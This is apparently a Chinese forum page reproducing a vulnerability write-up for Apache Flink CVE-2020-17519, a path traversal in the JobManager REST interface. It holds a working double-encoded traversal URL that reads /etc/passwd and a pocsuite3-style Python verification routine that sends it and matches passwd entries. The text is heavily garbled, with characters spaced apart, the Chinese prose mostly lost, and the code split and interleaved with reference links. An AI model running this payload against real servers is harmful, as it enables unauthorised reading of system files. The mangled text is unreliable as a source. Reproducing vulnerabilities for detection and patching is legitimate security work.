[2044] 2021-01-06_漏洞复现ApacheFlinkCVE-2020-17519

文档创建者:s7ckTeam
浏览次数:8
最后更新:2025-01-16
2021-01-06_漏洞复现ApacheFlinkCVE-2020-17519   A p a c h e   F l i n k   C V E - 2 0 2 0 - 1 7 5 1 9   d o n 9   d o n 9 s e c   2 0 2 1 - 0 1 - 0 6   #   , 1 9 A p a c h e   F l i n k A p a c h e   F l i n k   1 . 1 1 . 0 ( 1 . 1 1 . 1 1 . 1 1 . 2 ) J o b M a n a g e r R E S T J o b M a n a g e r p o c : s u c c e s s : ( - p o c s u i t e 3 ) 1 . 1 1 . 0 1 . 1 1 . 1 1 . 1 1 . 2 #   * u n i x / j o b m a n a g e r / l o g s / . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f e t c % 2 5 2 f p a s s w d d e f   _ v e r i f y ( s e l f ) :         r e s u l t   =   { }         i f   s e l f . u r l . e n d s w i t h ( " / " ) :                 u r l   =   s e l f . u r l [ : - 1 ]         e l s e :                 u r l   =   s e l f . u r l         v u l _ p a t h s   =   [                 ' / j o b m a n a g e r / l o g s / . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f e t c % 2 5 2 f p a s s w d '         ]
F l i n k 1 . 1 1 . 3 1 . 1 2 . 0 # #       w e b 访 w e b - 线 . . 使 访 访 w i n d o w s 使 访   - 线 h t t p s : / / w w w . f r e e b u f . c o m / v u l s / 2 4 7 6 2 0 . h t m l h t t p s : / / g i t h u b . c o m / v u l h u b / v u l h u b /         ]         f o r   v u l _ p a t h   i n   v u l _ p a t h s :                 v u l _ u r l   =   u r l   +   v u l _ p a t h                 t r y :                         r e s p   =   r e q u e s t s . g e t ( v u l _ u r l ,   a l l o w _ r e d i r e c t s = F a l s e ,   v e r i f y = F a l s e )                         r e _ p a t t e r n   =   (                                 r " ( ( r o o t | b i n | d a e m o n | s y s | s y n c | g a m e s | m a n | m a i l | n e w s | w w w - d a t a | u u c p | b a c k u p | l i s t | p r o x y | g n a t s | n o b o d y "                                 r " | s y s l o g   "                                 r " | m y s q l | b i n d | f t p | s s h d | p o s t f i x ) : [ d w - s , ] + : d + : d + : [ w - _ s , ] * : [ w - _ s , / ] * : [ w - _ , "                                 r " / ] * [ r n ] ) " )                         i f   r e s p   a n d   r e s p . s t a t u s _ c o d e   = =   2 0 0 :                                 s e a r c h O b j   =   r e . s e a r c h ( r e _ p a t t e r n ,   r e s p . t e x t )                                 i f   s e a r c h O b j :                                         r e s u l t [ ' V e r i f y I n f o ' ]   =   { }                                         r e s u l t [ ' V e r i f y I n f o ' ] [ ' U R L ' ]   =   v u l _ u r l                                         b r e a k                 e x c e p t   E x c e p t i o n   a s   e x :                         p a s s         r e t u r n   s e l f . p a r s e _ o u t p u t ( r e s u l t )
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则